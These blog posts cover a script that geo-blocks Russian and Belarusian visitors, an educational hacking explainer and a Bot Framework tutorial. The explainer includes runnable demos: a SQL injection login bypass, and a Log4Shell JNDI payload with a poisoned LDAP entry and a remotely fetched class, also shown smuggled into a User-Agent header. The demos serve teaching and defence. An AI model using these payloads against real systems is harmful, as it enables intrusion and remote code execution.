RuBy – Blocking Russia and Belarus

The Internet is a funny place. At the exact same moment that Russian troops are committing war crimes in the real world, Russian users online are just bopping around as if everything is cool. ShutdownHook is anything but a large-scale website, but it does get enough traffic to provide interesting insights in the form of global usage maps. And pretty much every day, browsers from Russia (and very occasionally Belarus) are stopping by to visit.

Well, at least they were until this afternoon. My love for free speech does not extend to aiding and abetting my enemies — and until the people of Russia and Belarus abandon their attacks on Ukraine, I’m afraid that is the best term for what they are. And before you spin up the de rigueur argument about not punishing people for the acts of their government, please just save it. I get the point, but there is nobody on earth that can fix these countries other than their citizens. They do bear responsibility — just as I and my fellow Americans did when we granted a cowardly, bullying toddler the United States’ nuclear codes for four years. Regardless of our individual votes.

Anyways, while I’m certainly not changing the world with my amateur postings here on ShutdownHook, I am trying in a very small way to share ideas and experience that will make folks better engineers and more creative and eclectic individuals. And I just don’t want to share that stuff with people who are, you know, helping to kill families and steal or destroy their homes. Weird, I know.

Enter RuBy — a tiny little web service that detects browsers from these two countries and replaces site content with a static Ukrainian Flag. You can add it to your web site too, and I hope you will. All it takes is one line anywhere on your site:

 <script src="https://shutdownapps.duckdns.org:7076/ruby.js" type="text/javascript" defer></script>

It’s not perfect — the same VPN functionality that folks use to stream The Great Pottery Throw Down before it’s available in the States will foil my script. But that’s fine — the point is to send a general message that these users are not welcome to participate in civilized company, and I think it does the trick.

If you’d rather not use the script from my server, the code is freely-available on github — go nuts. I’ll cover all the details in this post, so keep on reading.

Geolocation Basics

Image credit Wikipedia

Geolocation is a general term for a bunch of different ways to figure out where a particular device exists in the real world. The most precise of these is embedded GPS. Pretty much all of our phones can receive signals from the GPS satellite network and use that information to understand where they are — it’s how Google Maps shows your position as you sit in traffic during your daily commute. It’s amazing technology, and the speed with which we’ve become dependent on it is stunning.

Most other approaches to positioning are similar; they rely on databases that map some type of identifiable signal to known locations. For your phone that might be cell towers, each of which broadcasts a unique identifier. Combining this data (e.g., from opencellid.org) with real-time signal strength can give some pretty accurate results. You can do the same thing with a location-aware database of wifi networks like the one at wigle.net (the nostalgia behind “wardriving” is strong for this nerd). Even the old WWII-era LORAN system basically worked this way.

But the grand-daddy of location techniques on the Internet is IP-based geolocation, and it remains the most common for locating far-away clients without access to signal-based data. Each device on the Internet has an “IP Address” used to route messages — you can see yours at https://whatsmyip.com/ (ok technically that’s probably your router’s address, but close enough). This address is visible to both sides of a TCP/IP exchange (like a browser making a request to a web server), so if the server has access to a location-aware database of IP addresses, it can estimate the browser’s real-world location. The good folks at ip2location.com have been maintaining exactly this database for years, and insanely they still make a version available for free at https://lite.ip2location.com/.

The good news for IP-based geolocation is that it’s hard to technically spoof an IP address. The bad news is that it’s easy to insert devices between your browser and a server, so spoofing isn’t really even required to hide yourself. The most common approach is to use a virtual private network (“VPN”). With a VPN your browser doesn’t directly connect to the web server at all — instead, it connects to a VPN server and asks it to talk to the real server on your behalf. As far as the server is concerned, you live wherever your VPN server lives.

There are whole companies like NordVPN that deliver VPN services. They maintain thousands of VPN servers — one click makes your browser appear to be anywhere in the world. Great for getting around regional streaming restrictions! And to be fair, a really good way to increase your privacy profile on the Internet. But still, just a teeny bit shady.

Geo-Blocking

There are a few ways to use IP-based location data to restrict who is allowed to visit a website. Most commercial or high-traffic sites sit behind some kind of a firewall, gateway or proxy, and most of these can automatically block traffic using location-based rules. This is actually pretty common, in particular to protect against countries (you know who you are) that tend to be havens for bad actors. Cloud providers like Azure and AWS are making this kind of protection more and more accessible, which is a great thing.

Another approach is to implement blocking at the application level, which is what I’ve done with RuBy. In theory this is super-simple, but there are some interesting quirks of the IP addressing landscape that make it worth some explanation.

But first a quick side note — there are no new ideas, and it turns out that I’m not the only person to have come up with this one. The folks over at redirectrussia.org have a script as well — it’s a little more complicated than mine, and a bit smarter — e.g., they limit web service calls by doing a first check on the browser’s timezone setting. They also allow the site owner to redirect blocked clients to a site of their choosing, whereas I just slap a flag over the page and call game over. Whichever you pick, you’re doing a solid for the good guys.

RuBy as a Web Service

Using the web service is about as simple as it gets; just add that one-line script fragment anywhere on your page and you’re done. Under the covers, what happens is this:

  • The browser fetches some javascript from the URL at https://shutdownapps.duckdns.org:7076/ruby.js. Note the “defer” attribute on the tag; this instructs the browser to load the script asynchronously and delay execution until the rest of the page is loaded. This avoids any performance impact for pages using the script.
  • The web service examines the incoming IP address and compares it to a list of known address ranges coming from Russia and Belarus. If the IP is not in one of those ranges, an empty script is returned and the page renders / behaves normally.
  • If the IP is in one of those ranges, the returned script replaces the HTML of the page with a full-window rendering of the Ukrainian flag (complete with official colors #005BBB and #FFD500). I considered redirecting to another site, but preferred the vibe of fully dead-ending the page.

Most systems can pretty easily add script tags to template pages. For ShutdownHook it was a little harder because I was using a subscription plan at WordPress.com that doesn’t allow it. This isn’t a problem if you’re on the “business” plan (I chose to upgrade) or are hosting the WordPress software yourself or anywhere that allows plugins. After upgrading, I used the very nice “Insert Headers and Footers” plugin to insert the script tag into the HEAD section of my pages.

And really, that’s it. Done and done.

RuBy Under the Covers

The lookup code itself lives in RuBy.java. It depends on access to the IP2Location Lite “DB1” database; in particular the IPV6 / CSV version. Now, there are tons of ready-to-go libraries for working with this database, including for Java. I chose to implement my own because RuBy has very specific, simple requirements that lend themselves to a more space- and time-efficient implementation than a general-purpose library. A classic engineering tradeoff — are those benefits worth the costs of implementation and code ownership? In my case I think so, because I’m running the service for free and want to keep hardware costs to a minimum, but there are definitely arguments on both sides.

In a nutshell, RuBy is configured with a database file and a list of countries to block (specified as ISO-3166 alpha-2 codes). It makes a number of assumptions about the format of the data file (listed at the top of the source file), so be careful if you use another data source. Only matching ranges are loaded into an array sorted by the start of the range, and queries are handled by binary-searching into the array to find a potentially matching range and then checking its bounds. For Russia and Belarus, this ends up holding only about 18,000 records in memory, so resource use is pretty trivial.

IP addressing does get a little complicated though; converting text-based addresses to the integer values in the lookup array can be tricky.

Once upon a time we all used “v4” addresses, which you’ve surely seen and look like this: 127.0.0.1. Each of the four numbers are byte values from 0-255, so there are 8 * 4 = 32 bits available for a total of about 4.3 billion unique addresses. Converting these to a number is a simple matter that will look familiar to anyone who ever had to implement “atoi” in an interview setting:

a.b.c.d = (16777216 * a) + (65536 * b) + (256 * c) + d

Except, oops, it turns out that the Internet uses way more than 4.3 billion addresses. Back a few years ago this was the source of much hand-wringing and in fact the last IPv4 addresses were allocated to regional registries more than a decade ago. The long-term solution to the problem was to create “v6” addressing which uses 128 bits and can assign a unique address to a solid fraction of all the atoms that make up planet Earth. They’re pretty ugly (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334), but they do the trick.

Sadly though, change is hard, and IPv4 has stubbornly refused to die — only something like 20-40% of the traffic on the Internet is currently using IPv6. Mostly this is because somebody invented NAT (Network Address Translation) — a simple protocol that allows all of the dozens of network devices in your house or workplace to share a single public IP address. So at least for the foreseeable future, we’ll be living in a world where both versions are out in the wild.

To get the most coverage, we use the IP2Location database that includes both v4 and v6 addresses. All of the range values in this database are specified as v6 values, which we can manage because a v4 address can be converted to v6 just by adding “::FFFF:” to the front. This amounts to adding an offset of 281,470,681,743,360 to its natural value — you can see this and the other gyrations we do in the addressToBigInteger method (and for kicks its reverse in bigIntegerToAddress).

Spread the Word!

Technically, that’s about it — pretty simple at the end of the day. But getting everything lined up cleanly can be a bit of a hassle; I hope that between the service and the code I’ve made it a little easier.

Most importantly, I hope people actually use the code on their own websites. We really are at a critical moment in modern history — are we going to evolve into a global community able to face the big challenges, or will we slide back to 1850 and play pathetic imperialist games until we just extinguish ourselves? My generation hasn’t particularly distinguished itself yet in the face of this stuff, but I’m hopeful that this disaster is blatant enough that we’ll get it right. My call to action:

  • If you run a website, consider blocking pariah nations. You can do this with your firewall or gateway, with the RuBy or Redirect Russia scripts, or just roll your own. The only sites I hope we’ll leave open are the ones that might help citizens in these countries learn the truth about what is really happening.
  • Share this article with colleagues and friends on social media so they can do the same.
  • And even more key, (1) give to causes like MSF that provide humanitarian aid, and (2) make sure our representatives continue supporting Ukraine with lethal aid and punishing Russia/Belarus with increasing sanctions.

If I can help with any of this, just drop me a line and let me know.

Attribution: This site or product includes IP2Location LITE data available from https://lite.ip2location.com.

You got your code in my data, or, how hacks work.

Once upon a time, hacking was easy and cheap entertainment, and we did it all the time:

  • Microsoft’s web server used to just pass URLs through to the file system, so often you could just add “::$DATA” to the end of a URL and read source code.
  • Web server directory browsing was usually enabled, making it super-easy to troll around for config files, backups or other goodies.
  • SQL injection bugs (more on this later) were rampant.
  • A shocking number of servers exposed unsecured pages like /env.php and /test.php.
  • …and many more.

The arms race has spiraled higher and higher since those simple happy days. Today, truly novel technical hacks are pretty rare, but the double-threat of social engineering (phishing, etc.) and sloppy patch management (servers left running with known vulnerabilities) is as common as ever, and so the dance goes on. As I understand it, most of the successful attacks currently being executed by Anonymous against Russia (and frankly bully for that good work) are just old scripts running against poorly-maintained servers. It’s more about saturating the attack space than finding new vulnerabilities.

But per the usual, it’s the technical side that I find endlessly fascinating. And since there’s a pretty big gap between what gets reported on the news (“The Log4j security flaw could impact the entire internet”) and in the security forums (“Apache Log4j2 2.0-beta9 through 2.15.0 excluding security releases 2.12.2, 2.12.3, and 2.3.1 – JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints”), I thought it’d be fun to try to help normal humans understand what’s going on.

Most non-social hacks involve an attacker entering data into a system (using input fields, URLs, etc.) that ends up being executed as code inside that system. Once it’s inside a trusted process, code can do pretty much anything — read and write files, update the environment, make network calls, all kinds of bad stuff. There are approaches to limit the damage, but in most cases it’s Game Over.

Folks trying to hack a particular system will first try to understand the attack surface — that is, all of the ways users can provide input to the system. These can be totally legitimate channels, like a login form on a web site; or accidental ones, like administrative network ports exposed to the public network. Armed with this inventory, hackers attempt to craft data values that allow them to inject and execute code inside the process.

I’m going to dig into three versions of that pattern: SQL Injections, stack-based buffer overruns, and the current bugaboo Log4Shell. There’s a lot here and it’s definitely too long, but I was having too much fun to stop. That said, each of the sections stands alone, so if you have a favorite exploit feel free to jump around!

Note: I am providing real code for two of these; you can totally run it yourself and I hope you will. And before you freak out — nothing I am sharing is remotely novel to the Bad Guys out there. I may have lost some of my Libertarian leanings over the past few years, but I still believe that trying to protect people by hiding facts or knowledge never, ever, ever turns out well in the end. It just cedes power to the wrong side.

1. The Easy One (SQL Injection)

Most of the websites you use every day store their information in databases, or more specifically structured databases that are accessed using a language called SQL. A SQL database keeps information in “tables” which are basically just Excel worksheets — two-dimensional grids in which each row represents an item and each column represents some feature of that item. For example, most systems will have a “users” table that keeps one row for every authorized user. Something like this:

Actually nobody really stores passwords like this unless they are monumentally stupid. And real databases typically contain a bunch of tables with complex relationships between them. But neither of these are important for our purposes here, so I’ve simplified a bit.

Anyways, “SQL” is the language used to add, update and retrieve data in these tables. To retrieve data, you construct a “select” command that specifies which columns and rows you wish to see. For example, if I want to find the email addresses of all administrators in the system, I might execute a command like this:

select email from users where is_admin = true;

Now let’s imagine we’re implementing a login page for a web site. We build an HTML form that has text boxes to enter “username” and “password,” and a “submit” button that sends them to our server. The server then constructs and runs a query such as the following:

select user from users where user = 'USERNAME' and pw = 'PASSWORD'

where USERNAME and PASSWORD represent the values provided by the user. If those values match a row in the database, that row will be returned, and we can grant the user access to the system. If not, zero rows will be returned, and we should instead return a “login failed” error message.

Most websites use something very much like this to manage access. It’s a classic situation in which data (the USERNAME and PASSWORD values) are mixed with code (the rest of the SQL query). As a hacker, is it possible for us to construct data that will change the behavior of the code around it? It turns out that the answer is absolutely yes, unless the developer has taken certain precautions. Let’s see how that works.

Sql.java uses “JDBC” and a (very nice) SQL database called “MySQL” to demonstrate an injection attack. On a system that has git, maven and a JDK installed, build this code as follows:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/hack
mvn clean package

Once built, it creates a table like the one above; you can simulate login attempts like this (using whatever values you like for the user and pass parameters at the end):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 pass2
Logged in as user: user2

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 nope
Login failed.

The code that constructs the query is at line 47; a simple call to String.format() that inserts the provided username and password into a template SQL string:

String sql = String.format("select user from u where user = '%s' and pw = '%s'", user, password);

So far so good, but watch what happens if we use some slightly unusual parameters:

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad "user2' --" nope
Logged in as user: user2

Oh my. Even thought we provided an incorrect password, we were able to trick the system into logging us in as user2 (an administrator no less). To understand how this happened, you need to know that SQL commands can contain “comments.” Any characters following “--” in a line of SQL are simply ignored by the interpreter. So if you apply these new input values to the String.format() call, the result is:

select user from u where user = 'user2' -- and pw = 'nope'

Our carefully constructed data values terminate the first input string and then causes the rest of the command to be ignored as a comment. Since the command now asks for all rows where user = 'user2' without any reference to the password, the row is faithfully returned, and login is granted. Of course, a hack like this requires knowledge of the query in which the input values will be placed — but thanks to the use of common code and patterns across systems, that is rarely a significant barrier to success.

Fortunately, JDBC (like every SQL library) provides a way for us to prevent attacks like this. The alternate code at line 72 lets us breathe easy again (note we’re specifying sqlgood instead of sqlbad as the first parameter):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlgood "user2' --" passX
Login failed.

Whew! Instead of directly inserting the values into the command, this code uses a “parameterized statement” with placeholders that enable JDBC to construct the final query. These statements “escape” input values so that special characters like the single-quote and comment markers are not erroneously interpreted as code. Some people choose to implement this escaping behavior themselves, but trust me, you don’t want to play that game and get it wrong.

SQL injection was one of the first really “accessible” vulnerabilities — easy to perform and with a big potential payoff. And despite being super-easy to mitigate, it’s still one of the most common ways bad guys get into websites. Crazy.

2. The Grand-Daddy (Buffer Overrun)

In the early 2000s it seemed like every other day somebody found a new buffer overrun bug, usually in Windows or some other Microsoft product (this list isn’t all buffer exploits, but it does give you a sense of the magnitude of the problem). Was that because the code was just bad, or because Windows had such dominant market share that it was the juiciest target? Probably a bit of both. Anyways, at least to me, buffer overrun exploits are some of the most technically interesting hacks out there.

That said, there’s a lot of really grotty code behind them, and modern operating systems make them a lot harder to execute (a good thing). So instead of building a fully-running exploit in this section, I’m going to just talk us through it.

For the type of buffer overrun we’ll dig into, it’s important to understand how a “call stack” works. Programs are built out of “functions” which are small bits of code that each do a particular thing. Functions are given space to store their stuff (local variables) and can call other functions that help them accomplish their purpose. For example, a “stringCopy” function might call a “stringLength” function to figure out how many characters need to be moved. This chain of functions is managed using a data structure called a “call stack” and some magic pointers called “registers”. The stack when function1 is running looks something like this:

The red and green bits make up the “stack frame” for the currently-running function (i.e., function1). The RBP register (in x64 systems) always points to the current stack frame. The first thing in the frame (the red part) is a pointer to the frame for the previous function (not shown) that called function1. The other stuff in the frame (the green part) is where function1’s local variables are stored.

When function1 calls out to function2, a few things happen:

  1. The address of the next instruction in function1 is pushed onto the top of the stack (blue below). This is where execution will resume in function1 after function2 completes.
  2. The current value of RBP is pushed onto the top of the stack (red above blue below).
  3. The RBP register is set to point at this new location on the stack. This “chain” from RBP to RBP lets the system quickly restore things for function1 when function2 completes.
  4. The RSP register is set to point just beyond the amount of space required for function2’s local variables. This is just housekeeping so we know where to do this dance again in case function2 also makes function calls.
  5. Execution starts at the beginning of function2.

I left out some things there, like the way parameters are passed to functions, but it’s good enough. At this point our stack looks like this:

Now, let’s assume that function2 looks something like this (in C, because buffer overruns usually happen in languages like C that have fewer guard rails):

void function2(char *input) {
    char[10] buffer;
    strcpy(buffer, input);
    /* do something with buffer */
    return;
}

If the input string is less than 10 characters (9 + a terminating null), everything is fine. But what happens if input is longer than this? The strcpy function happily copies over characters until it finds the null terminator, so it will just keep on copying past the space allocated for buffer and destroy anything beyond that in the stack — writing over the saved RBP value, over the return address, maybe even into the local variables further down:

Typically a bug like this just crashes the program, because when function2 returns to its caller, the return address it uses (again in blue, now overwritten by yellow) is now garbage and almost certainly doesn’t point at legitimate code. Back in the good old days before hackers got creative, that was the end of it. A bummer, something to fix, but not a huge deal.

But it turns out that if you know a bug like this exists, you can (carefully) construct an input string that can do very bad things indeed. Your malicious input data must have two special properties:

First, it needs to contain “shellcode” — hacker jargon for a sequence of bytes that is actually code (more specifically, opcodes for the targeted platform) that does your dirty work. Shellcode needs to be pretty small, so usually it just “bootstraps” the real hack. For example, common shellcode downloads and runs a much larger code package from a well-known network server owned by the hacker. The really tricky thing about building shellcode is that it can’t contain any null bytes, because it has to be a valid C string. Most hackers just reuse shellcode that somebody else wrote, which honestly seems less than sporting.

Second, it needs to be constructed so that the bytes that overwrite the return address (blue) point to the shellcode. When function2 completes, the system will dutifully start executing the code pointed to by this location. Doing this was traditionally feasible because the bottom of the stack always starts at a fixed, known address. It follows that whenever function2 is called in a particular context, the value of RBP should be the same as well. So theoretically you could build a fixed input string that looks like the yellow here:

p0wnd! So now we’re hackers, right? Well, not quite. First, finding that fixed address is quite complicated — I won’t go any further down that rabbit hole except to say that whoever figured out noop sleds was brilliant. But much worse for our visions of world domination, today’s operating systems pick a random starting address for the stack each time a process runs, rendering all that work to figure out the magic address useless. For that matter, C compilers now are much better about adding code to detect overruns before they can do damage anyways, so we may not even have gotten that far. But still, pretty cool.

3. The Latest One (Log4Shell)

Last mile folks, I promise — and I hope you’re still with me, because this last hack is a fun one and it’s easy to run yourself. Tons and tons and tons of apps were vulnerable to Log4Shell when it burst onto the scene just a few months ago. This is kind of sad, because it means that we’re all running some pretty old code. But I guess that’s the way the world works, and why there is still a market for COBOL and FORTRAN developers.

It all starts with “logging.” Software systems can be pretty complicated, so it’s useful to have some kind of trail that helps you see what is (or was) happening inside them. There are a few ways of doing this, but the old standby is simply logging — adding code to the system that writes out status messages along the way. This is particularly useful when you’re trying to understand systems in production — e.g., when a user calls and says “I tried to upload a file this morning and it crashed,” reviewing the log history from the time when this happened might give you some insight into what really went wrong.

This seems pretty straightforward, and in fact the JDK natively supports a pretty serviceable set of logging APIs. But of course things never stay simple:

  • Adding logs has a performance impact, so we’d like a way to turn them on or off at runtime, both in terms of the severity of the message (e.g., the difference between very verbose debugging logs and critical error information) and where it comes from (e.g., you might want to turn on logs for just outbound HTTP messages).
  • It’d be nice to control where the log data is saved — a file, a database, a service like Sumo Logic (there is a whole industry around this), whatever.
  • Logs can get pretty big so some kind of rotation or archive strategy would be helpful.
  • The native stuff is slow in some cases, and configuration is unwieldy, and so on.
  • Developers just really like writing developer tools (me too).

A bunch of libraries sprung up to address these gaps — and especially with the advent of dependency-management tools like Maven, the Apache Log4j project quickly became basically ubiquitous in Java applications. As a rule I try to avoid dependencies, but there are some good reasons to accept this one. So it’s everywhere. Like, everywhere. And because it’s used so commonly and serves so many scenarios, Log4j has grown into quite a beast — most folks use a tiny fraction of its features. And that’s kind of fine, except when it’s not.

OK. This one is pretty satisfying to run yourself. First, clone and build the hack app I described in the SQL Injection section earlier. The app includes an old Log4j version that contains the vulnerability, and lets you play with various log messages like this (I’ll explain the trustURLCodebase thing in a bit):

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'yo dawg'
11:35:25.029 [main] ERROR com.shutdownhook.hack.Logs - yo dawg

The app uses the default Log4j configuration that adds a timestamp and some other metadata to the message and outputs to the console. Pretty simple so far. Now, one of those features in Log4j is the ability to add specially-formatted tokens in a message that include dynamic data in the output. So for example:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'user = ${env:USER}, java = ${java:version}'
11:42:31.358 [main] ERROR com.shutdownhook.hack.Logs - user = sean, java = Java version 11.0.13

The first token there looks up the environment variable “USER” and inserts the value found (sean). The second one inserts the currently-running Java version. Kind of cool. There are a bunch of different lookup types, and you can add your own too.

If you’re guessing that the source of our hack might be in a lookup, you nailed it. The “JNDI” lookup dynamically loads objects by name from a local or remote directory service. This kind of thing is common in enterprise Java applications — serialized objects are pushed across network wires and reconstituted in other processes. There are a few flavors of how a JNDI lookup can work, but this one in particular works well for our hack:

  • The JDNI lookup references an object stored in a remote LDAP directory server.
  • The entry in LDAP indicates that the object is a “javaNamingReference;” that the class and factory name is “Attack;” and that the code for these objects can be found at a particular URL.
  • Log4j downloads the code from that URL, instantiates the factory object, calls its “getObjectReference” method, and calls “toString” on the returned object.
  • Boom! Because the code can be downloaded from any URL, if an attacker can trick you into logging a message of their choosing, they can quite easily bootstrap their way into your process. Their toString method can do basically anything it wants.

This is way more impressive when you see it in action. To do that, you’ll need an LDAP server to host the poisoned directory entry. The simplest way I’ve found to do this is by downloading the UnboundID LDAP SDK for Java, which comes with a command-line tool called in-memory-directory-server. Assuming you are still in the “hack” directory where you built the code for this article, this command will put you in business:

PATH_TO_UNBOUNDID_SDK/tools/in-memory-directory-server \
    --baseDN "o=JNDIHack" --port 1234 --ldifFile attack/attack.ldif

You also need an HTTP server hosting the Attack.class binary. In order to keep things simple, I’ve posted a version up on Azure and set javaCodeBase in attack.ldif to point there. Generally though, you shouldn’t be running binaries that are sitting randomly out on the net, even when they were put there by somebody as upstanding and trustworthy as myself. If you want to avoid that, just compile Attack.java with “javac Attack.java,” put the resulting class file up on any web server you control, and update line 13 in attack.ldif to point there instead.

With the attacker-controlled LDAP and HTTP servers running, execute the hack app with an embedded JNDI lookup in the message:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log '${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}'
12:22:25.857 [main] ERROR com.shutdownhook.hack.Logs - nothing to see here

And now the kicker:

$ ls -l /tmp/L33T*
-rw------- 1 sean sean 0 Apr  7 12:22 /tmp/L33T-15518763719698030164-shutdownhook

Dang son, now that’s a hack. Simply by logging a completely legit data string, I can force any code from anywhere on the Internet to run in your JVM. The code that returned “nothing to see here” and created a file in your /tmp directory lives right here. Remember that the code runs with full privileges to the process and can do anything it wants. And unlike shellcode, it doesn’t even have to be clever. Yikes.

One caveat: we’re definitely cheating by setting the parameter com.sun.jndi.ldap.object.trustURLCodebase to true. For a long time now (specifically since version 8u191) Java has disabled this behavior by default. So folks running new versions of Java generally weren’t vulnerable to this exact version of the exploit. Unfortunately, it still works for locally sourced classes, and hackers were able to find some commonly-available code that they could trick into bad behavior too. The best description of this that I’ve seen is in the “Exploiting JNDI injections in JDK 1.8.0_191+” section of this article.

But wait a second, there’s one more problem. In my demonstration, we chose the string that gets logged! This doesn’t seem fair either — log messages are created by the application developer, not the end user, so how did the Bad Guys cause those poisoned logs to be sent to Log4j in the first place? This brings us right back to the overarching theme: most effective hacks come from code hiding in input data, and sometimes those input channels aren’t completely obvious.

For example, when your web browser makes a request to a web server, it silently includes a “header” value named “User-Agent” that identifies the browser type and version. Even today, many website bugs are caused by incompatibilities from browser to browser, so web servers almost always log this User-Agent value for debugging purposes. But anyone can make a web request, and they can set the User-Agent field to anything they like.

Smells like disaster for the Good Guys. If we send a User-Agent header like “MyBrowser ${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}”, that string will very very likely be logged, which will kick off the exact remote class loading issue we demonstrated before. And with just a little understanding of how web servers work, you can come up with a ton of other places that will land your poisoned message into logging output. Bummer dude.

And, scene.

That’s probably enough of this for now. Two takeaways:

  1. For the love of Pete — control your dependencies, have a patching strategy and hire a white hat company to do a penetration test of your network. Don’t think you’re too small to be a target; everyone is a target.
  2. There is just something incredibly compelling about a good hack — figuring out how to make a machine do something it wasn’t designed to do is, plain and simple, good fun. And it will make you a better engineer too. Just don’t give in to the dark side.

As always, feel free to ping me if you have any trouble with the code, find a bug or just have something interesting to say — would love to hear it. Until next time!

Ground-Up with the Bot Framework

It seems I can’t write about code these days without a warmup rant. So feel free to jump directly to the next section if you like. But where’s the fun in that?

My mixed (ok negative) feelings about “quickstarts” go back all the way to the invention of “Wizards” at Microsoft in the early 1990s. They serve a worthy goal, guiding users through a complex process to deliver value quickly. But even in those earliest days, it was clear that the reality was little more than a cheap dopamine hit, mostly good for demos and maybe helping show what’s possible. The problem comes down to two (IMNSHO) fatal flaws:

First, quickstarts abandon users deep in the jungle with a great SUV but no map or driver’s license. Their whole reason to exist is to avoid annoying details and optionality, but that means that the user has no understanding of the context in which the solution was created. How do you change it? What dependencies does it require? How does it fit into your environment? Does it log somewhere? Is it secured appropriately for production? How much will it cost to run? The end result is that people constantly put hacked-up versions of “Hello World” into production and pay for it later when they have no idea what is really going on.

Second, they make developers even lazier than they naturally are anyways. Rather than start with the basics, quickstarts skip most of the hard stuff and lock in decisions that any serious user will have to make for themselves. If this was the start of the documentation, that’d be fine — but it’s usually the end. Instead of more context, the user just gets dropped unceremoniously into auto-generated references that don’t provide any useful narrative. Even worse, existence of the quickstart becomes an excuse for a sloppy underlying interface design (whether that’s an API or menus and dialogs) — e.g., why worry about the steering wheel if people take the test-drive using autopilot?

Anyways, this is really just a long-winded way to say that the Bot Framework quickstart is pretty useless, especially if you’re using Java. Let’s do better, shall we?

What is the Bot Framework?

There are a bunch of SDKs and builders out there for creating chatbots. The Microsoft Bot Framework has been around for a while (launched out of Microsoft Research in 2016) and seems to have pretty significant mindshare. Actually the real momentum really seems to be with no-code or low-code options, which makes sense given how many bots are shallow marketing plays — but I’m jumping right into the SDK here because that’s way more fun, and it’s my blog.

The framework is basically a big normalizer. Your bot presents a standardized HTTPS interface, using the Bot Framework SDK to help manage the various structures and state. The Azure Bot Service acts as a hub, translating messages in and out of various channels (Teams, Slack, SMS, etc.) and presenting them to your interface. Honestly, that’s basically the whole thing. There are additional services to support language understanding and speech-to-text and stuff like that, but it’s all additive to the basic framework.

WumpusBot and RadioBot

I introduced WumpusBot in my last post … basically a chatbot that lets you play a version the classic 1970s game Hunt the Wumpus. The game logic is adapted from a simplified version online and lives in Wumpus.java, but I won’t spend much time on that. I’ve hooked WumpusBot up to Twillio SMS, so you can give it a try by texting “play” to 706-943-3865.

The project also contains RadioBot, a second chatbot that knows how to interact with the Shutdown Radio service I’ve talked about before. This one is hooked up to Microsoft Teams and includes some slightly fancier interactions — I’ll talk about that after we get a handle on the basics.

Build Housekeeping

All this is hosted in an Azure Function App — so let’s start there. The code is on github. You’ll need git, mvn and a JDK. Build like this:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package install
cd ../radio/azure
mvn clean package

To run you’ll need two Cosmos Containers (details in Shutdown Radio on Azure, pay attention to the Managed Identity stuff) and a local.settings.json file with the keys COSMOS_ENDPOINT, COSMOS_ DATABASE, COSMOS_CONTAINER and COSMOS_CONTAINER_WUMPUS. You should then be able to run locally using “mvn azure-functions:run.”

Getting a little ahead of myself, but to deploy to Azure you’ll need to update the “functionAppName” setting in pom.xml; “mvn azure-functions:deploy” should work from there assuming you’re logged into the Azure CLI.

The Endpoint

Your bot needs to expose an HTTPS endpoint that receives JSON messages via POST. The Java SDK would really like you to use Spring Boot for this, but it 100% isn’t required. I’ve used a standard Azure Function for mine; that code lives in Functions.java. It really is this simple:

  1. Deserialize the JSON in the request body into an Activity object (line 68).
  2. Pull out the “authorization” header (careful of case-sensitivity) sent by the Bot Framework (line 71).
  3. Get an instance of your “bot” (line 52). This is the message handler and derives from ActivityHandler in WumpusBot.java.
  4. Get an instance of your “adapter.” This is basically the framework engine; we inherit ours from BotFrameworkHttpAdapter in Adapter.java.
  5. Pass all the stuff from steps 1, 2 and 3 to the processIncomingActivity method of your Adapter (line 74).
  6. Use the returned InvokeResponse object to send an HTTPS status and JSON body back down the wire.

All of which is to say, “receive some JSON, do a thing, send back some JSON.” Wrapped up in a million annoying Futures.

The Adapter

The BotAdapter acts as ringmaster for the “do a thing” part of the request, providing helpers and context for your Bot implementation.

BotFrameworkHttpAdapter is almost sufficient to use as-is; the only reason I needed to extend it was to provide a custom Configuration object. By default, the object looks for configuration information in a properties file. This isn’t a bad assumption for Java apps, but in Azure Functions it’s way easier to keep configuration in the environment (via local.settings.json during development and the “Configuration” blade in the portal for production). EnvConfiguration in Adapter.java handles this, and then is wired up to our Adapter at line 34.

The adapter uses its configuration object to fetch the information used in service-to-service authentication. When we register our Bot with the Bot Service, we get an application id and secret. The incoming authentication header (#2 above) is compared to the “MicrosoftAppId” and “MicrosoftAppSecret” values in the configuration to ensure the connection is legitimate.

Actually, EnvConfiguration is more complicated than would normally be required, because I wanted to host two distinct bots within the same Function App (WumpusBot and RadioBot). This requires a way to keep multiple AppId and AppSecret values around, but we only have one System.env() to work with. The “configSuffix” noise in my class takes care of that segmentation.

There are a few other “providers” you can attach to your adapter if needed. The most common of these is the “AuthenticationProvider” that helps manage user-level OAuth, for example if you want your bot to access a user’s personal calendar or send email on their behalf. I didn’t have any need for this, so left the defaults alone.

Once you get all this wired up, you can pretty much ignore it.

The Bot

Here’s where the fun stuff starts. The Adapter sets up a TurnContext object and passes it to the onTurn method of your Bot implementation. The default onTurn handler is really just a big switch on the ActivityType (MESSAGE, TYPING, CONVERSATION_UPDATE, etc.) that farms out calls to type-specific handlers. Your bot can override any of these to receive notifications on various events.

The onMessageActivity method is called whenever your bot receives a (duh) message. For simple text interactions, simply call turnContext.getActivity().getText() to read the incoming text, and turnContext.sendActivity(MessageFactory.text(responseString)) to send back a response.

